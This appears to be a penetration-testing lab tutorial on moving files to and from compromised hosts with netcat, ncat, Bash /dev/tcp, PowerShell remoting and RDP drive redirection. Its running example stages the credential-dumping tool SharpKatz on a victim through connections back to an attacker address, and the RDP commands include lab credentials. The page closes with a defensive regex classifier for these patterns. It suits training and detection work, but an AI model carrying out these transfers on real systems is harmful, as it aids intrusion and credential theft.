# Miscellaneous File Transfer Methods

Use this page when common HTTP, SMB, or language-based methods are unavailable.

It covers `netcat`, `ncat`, PowerShell remoting, and RDP drive redirection.

{% hint style="info" %}
**Attacker** means your box, Pwnbox, or redirector.

**Compromised host** means the machine you already accessed.
{% endhint %}

Each workflow below marks which side runs each command.

### Netcat and Ncat

`nc` and `ncat` can move files in either direction.

Pick the direction that fits the firewall path.

`ncat` is the Nmap project's modern reimplementation of Netcat.

On some systems, `nc`, `ncat`, and `netcat` may point to the same binary.

#### Send a file from the attacker to the compromised host

This flow works well when the compromised host can accept an inbound connection.

In this example, the attacker sends `SharpKatz.exe` to the compromised host.

**Step 1**

**Compromised host — listen with original Netcat**

```bash
nc -l -p 8000 > SharpKatz.exe
```

**Compromised host — listen with Ncat**

```bash
ncat -l -p 8000 --recv-only > SharpKatz.exe
```

**Step 2**

**Attacker — download the file you want to send**

```bash
wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
```

**Attacker — send the file with original Netcat**

```bash
nc -q 0 <compromised-ip> 8000 < SharpKatz.exe
```

**Attacker — send the file with Ncat**

```bash
ncat --send-only <compromised-ip> 8000 < SharpKatz.exe
```

Replace `<compromised-ip>` with the target IP.

`-q 0` (original Netcat) and `--send-only` (Ncat) close the session after the file finishes sending.

#### Make the compromised host pull the file from the attacker

This flow helps when inbound access to the compromised host is blocked.

The attacker listens and serves the file.

The compromised host connects out and saves it.

**Original Netcat**

**Attacker — listen and send the file**

```bash
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

**Compromised host — connect back and save the file**

```bash
nc <attacker-ip> 443 > SharpKatz.exe
```

**Ncat**

**Attacker — listen and send the file**

```bash
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

**Compromised host — connect back and save the file**

```bash
ncat <attacker-ip> 443 --recv-only > SharpKatz.exe
```

Replace `<attacker-ip>` with your listener IP.

#### Use `/dev/tcp` when Netcat is missing

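Bash can read from `/dev/tcp/host/port`: in a redirection it opens a TCP connection to that host and port. This is a Bash feature, not a real device file.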

This is useful when the compromised host has Bash but no `nc`.

**Attacker — listen and send the file with original Netcat**

```bash
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

**Attacker — listen and send the file with Ncat**

```bash
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

**Compromised host — receive the file through `/dev/tcp`**

```bash
cat < /dev/tcp/<attacker-ip>/443 > SharpKatz.exe
```

The same pattern also works in reverse.

You can receive a file on the attacker and send it from the compromised host.

### PowerShell remoting

Use PowerShell remoting when HTTP, HTTPS, or SMB transfer paths are unavailable.

This requires WinRM access and enough rights on the remote system.

By default, WinRM listens on:

* `5985/tcp` for HTTP
* `5986/tcp` for HTTPS

In this example, `DC01` copies files to and from `DATABASE01`.

#### Verify WinRM access

**Compromised Windows host or admin foothold — confirm your current context**

```powershell
whoami
hostname
```

**Compromised Windows host or admin foothold — test WinRM on the remote host**

```powershell
Test-NetConnection -ComputerName DATABASE01 -Port 5985
```

#### Create the remoting session

**Compromised Windows host or admin foothold — open a PowerShell session**

```powershell
$Session = New-PSSession -ComputerName DATABASE01
```

#### Copy files through the session

**Compromised Windows host or admin foothold — copy a local file to the remote host**

```powershell
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
```

**Compromised Windows host or admin foothold — copy a remote file back to the current host**

```powershell
Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
```

{% hint style="info" %}
These commands run from the Windows system where you already have the PowerShell session.

That system may be your current compromised host or another host you control in the environment.
{% endhint %}

### RDP drive redirection

RDP lets you move files by copy and paste or by redirecting a local drive.

Drive redirection is usually more reliable.

#### Mount a local Linux folder in the RDP session

**Attacker — mount a local folder with `rdesktop`**

```bash
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

**Attacker — mount a local folder with `xfreerdp`**

```bash
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

Inside the RDP session, browse to `\\tsclient\` to access the redirected folder.

That lets you copy files between your local machine and the remote desktop session.

![Windows File Explorer showing a network folder named 'tsclient' with a subfolder 'linux'.](https://cdn.services-k8s.prod.aws.htb.systems/content/modules/24/tsclient.jpg)

#### Use the native Windows RDP client

From Windows, you can also use `mstsc.exe` and enable local drive sharing before connecting.

![Remote Desktop Connection settings showing options for configuring remote audio, keyboard shortcuts, and local resources like printers and drives.](https://cdn.services-k8s.prod.aws.htb.systems/content/modules/24/rdp.png)

{% hint style="warning" %}
If Windows Defender scans the redirected folder, it may delete flagged files.

Be careful when sharing payload directories.
{% endhint %}

{% hint style="info" %}
Redirected drives are only available inside that RDP session.

Other logged-in users cannot access them directly.
{% endhint %}
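
A defender's view of the three methods above (Netcat and `/dev/tcp`, PowerShell remoting, RDP drive redirection), as an added example that is not part of the original page: a small classifier that flags the command-line patterns these transfers leave in process or script-block telemetry. The rule labels, the `classify` and `scan` names, and the sample lines are constructed for illustration.

```python
import re

# Netcat-family binary name as its own token (bare or path-qualified).
NC = r"(?<![\w.-])(?:nc|ncat|netcat)(?:\.exe)?\s"

# Rules mirror the transfer commands on this page; labels are hypothetical names.
RULES = [
    # Listener: a short-option cluster containing "l" (e.g. -l, -lvnp) or --listen.
    ("netcat-listener",
     re.compile(NC + r"(?:.*\s)?(?:-[a-zA-Z]*l[a-zA-Z]*|--listen)(?=\s|$)")),
    # Ncat one-way transfer flags.
    ("ncat-one-way", re.compile(NC + r"(?:.*\s)?--(?:send|recv)-only(?=\s|$)")),
    # Bash pseudo-path; visible in shell history or script text, not in exec args.
    ("bash-dev-tcp", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    # Copy-Item over a PSSession, in either direction.
    ("psremoting-copy",
     re.compile(r"\bCopy-Item\b.*\s-(?:To|From)Session\b", re.I)),
    # Client-side drive redirection switches for rdesktop and xfreerdp.
    ("rdp-drive-redirect",
     re.compile(r"\brdesktop\b.*\s-r\s+disk:|\bxfreerdp\b.*\s/drive:", re.I)),
    # Access to a redirected drive from inside the RDP session.
    ("tsclient-path", re.compile(r"\\\\tsclient\\", re.I)),
]

def classify(cmdline: str) -> list[str]:
    """Return the labels of every rule that matches one command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]

# Constructed sample telemetry (not captured from a real host).
SAMPLES = [
    "nc -l -p 8000",
    "sudo ncat -l -p 443 --send-only",
    "/usr/bin/ncat 192.0.2.10 443 --recv-only",
    "cat < /dev/tcp/192.0.2.10/443 > out.bin",
    r"Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Public",
    "xfreerdp /v:192.0.2.20 /u:user /drive:linux,/home/user/share",
    r"cmd /c copy \\tsclient\linux\notes.txt C:\Temp\notes.txt",
    "rsync -al /srv/data backup:/srv/",   # benign control: must not match
]

def scan(lines):
    """Map each flagged line to its labels; unflagged lines are omitted."""
    return {ln: hits for ln in lines if (hits := classify(ln))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLES).items():
        print(f"{', '.join(hits):32} {line}")
```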
